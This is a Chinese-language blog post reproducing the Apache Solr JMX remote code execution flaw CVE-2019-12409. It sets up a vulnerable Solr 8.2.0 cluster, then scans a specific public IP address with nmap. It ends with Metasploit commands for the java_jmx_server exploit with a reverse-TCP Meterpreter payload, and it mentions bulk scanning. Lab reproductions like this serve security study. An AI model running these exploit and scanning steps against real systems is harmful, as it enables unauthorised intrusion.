Apache Solr JMX服务 RCE 测试实践CVE-2019-12409

下载地址

wget http://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip

解压

unzip solr-8.2.0.zip

cd solr-8.2.0

启动回话

./bin/solr start -e cloud -force

以下3个问题都直接回车:
运行几个节点(默认2个),第一个节点端口(默认8983),第二个节点端口(默认7574)

To begin, how many Solr nodes would you like to run in your local cluster? (specify 1-4 nodes) [2]:  

Ok, let's start up 2 Solr nodes for your example SolrCloud cluster.
Please enter the port for node1 [8983]: 

Please enter the port for node2 [7574]: 

  

出现如下代码,输入techproducts,按回车:

Now let's create a new collection for indexing documents in your 2-node cluster.
Please provide a name for your new collection: [gettingstarted] 

  

这2个也直接回车 (分别是在2个节点上拆分索引,每个节点创建2个备份):

How many shards would you like to split techproducts into? [2]
How many replicas per shard would you like to create? [2]

  

出现如下代码: 输入sample_techproducts_configs ,按回车:

Please choose a configuration for the techproducts collection, available options are:
_default or sample_techproducts_configs [_default]

  

然后程序开始创建,出现如下代码表示成功:

SolrCloud example running, please visit: http://localhost:8983/solr 

  

访问http://vps:8983/solr

 

 

nmap -p 18983 116.255.218.147 -sT -sV

确定JMX服务已经开启,奇怪的是namp没能识别出对应的是什么服务,所以批量扫描时还得想办法如何识别这种服务

 

 

接下来使用msf的exp远程执行命令

msfconsole
use exploit/multi/misc/java_jmx_server
set RHOST 127.0.0.1
set RPORT 18983

set payload java/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
run

  

得到shell:

 

posted @ 2021-02-23 19:27  妇愁者纞萌  阅读(126)  评论(0编辑  收藏  举报